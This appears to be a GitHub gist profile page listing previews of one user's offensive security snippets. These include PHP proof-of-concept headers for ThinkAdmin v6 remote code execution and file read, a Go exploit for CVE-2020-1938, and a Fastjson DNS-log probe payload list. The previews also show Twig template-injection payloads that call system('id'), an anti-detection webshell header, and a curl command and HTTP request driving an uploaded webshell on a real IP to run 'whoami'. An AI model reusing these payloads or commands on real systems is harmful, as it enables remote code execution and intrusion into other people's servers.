Skip to content

Instantly share code, notes, and snippets.

View kaiili's full-sized avatar

kaiili

33 followers · 10 following
View GitHub Profile
@kaiili
kaiili / poc.php
Created February 6, 2020 10:07
POC for ThinkAdmin v6 RCE
<?php
/*
*
* Date: 2020-02-06
* Exploit Author: k4ii
* Daemon Link: https://v6.thinkadmin.top
* Version: v6
* Tested on: linux
* Usage:
@kaiili
kaiili / poc.php
Created February 6, 2020 10:18
POC for ThinkAdmin file read
<?php
/*
* Date: 2020-02-06
* Exploit Author: k4ii
* Daemon Link: https://v6.thinkadmin.top
* Version: v6
* Tested on: linux
* Usage:
* curl "https://v6.thinkadmin.top/admin/api.update/get" -d "encode=`php poc.php`"
@kaiili
kaiili / ctfwp_v&n_web
Created March 1, 2020 11:36
v&n ctf web部分wp
# web 1
一个简单的漏洞利用题,知道 ctfd的账号接管的洞就能做。
# web 2
伪代码如下
```
open("flag.txt","r")
def shell():
os.system("rm flag.txt")
@kaiili
kaiili / CNVD-2020-10487.go
Created March 2, 2020 03:28
my CNVD-2020-10487 / CVE-2020-1938 exp
package main
import (
"fmt"
"io"
"io/ioutil"
"net"
"os"
)
@kaiili
kaiili / cve-2020-2551.md
Last active March 5, 2020 07:41
关于 CVE-2020-2551 我知道的一切

定位: 是一个反序列化的入口,只需一个 gaget就能 RCE

影响版本: 和 jdk( jdk7u21) jython () 以及底层库(CommonsCollections) 还有补丁级别有关。并且存在其他 gadget利用的可能。

@kaiili
kaiili / 2020-春招提前批
Last active November 6, 2020 15:43
群友想看。。。
有三个面试机会。
奇安信,陌陌安全,腾讯。
奇安信:
大概是按照渗透的流程开始问的。
@kaiili
kaiili / checkFastjson.txt
Created March 29, 2020 13:17
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}
{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}
Set[{"@type":"java.net.URL","val":"dnslog"}]
Set[{"@type":"java.net.URL","val":"dnslog"}
{{"@type":"java.net.URL","val":"dnslog"}:0
@kaiili
kaiili / tricks
Last active May 1, 2020 00:50
记录一下我遇见的各种 trick
PHP:
readfile("phar:///1.png/test.txt") == readfile("phaR:///1.png/test.txt")
TWIG SSTI:
{{["id"]|map("system")|join(",")
{{["id", 0]|sort("system")|join(",")}}
{{["id"]|filter("system")|join(",")}}
{{[0, 0]|reduce("system", "id")|join(",")}}
@kaiili
kaiili / webshell.txt
Created April 13, 2020 15:28
anti-ast webshell?
<?php
/*
*
*
* 试图绕过 ast的分析
* 反序列化传递参数
* 注册全局变量绕过
* php://input
@kaiili
kaiili / dectf_web3
Created May 2, 2020 10:26
dectf_web3
curl http://47.113.219.76/uploads/45f0292421f355423a831fe1a054fa45/bc07fe4e8c3143511fa89936e833659d_2.Php --data "_=var_dump&__=system&___=whoami"
POST /uploads/45f0292421f355423a831fe1a054fa45/bc07fe4e8c3143511fa89936e833659d_2.Php HTTP/1.1
Host: 47.113.219.76
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate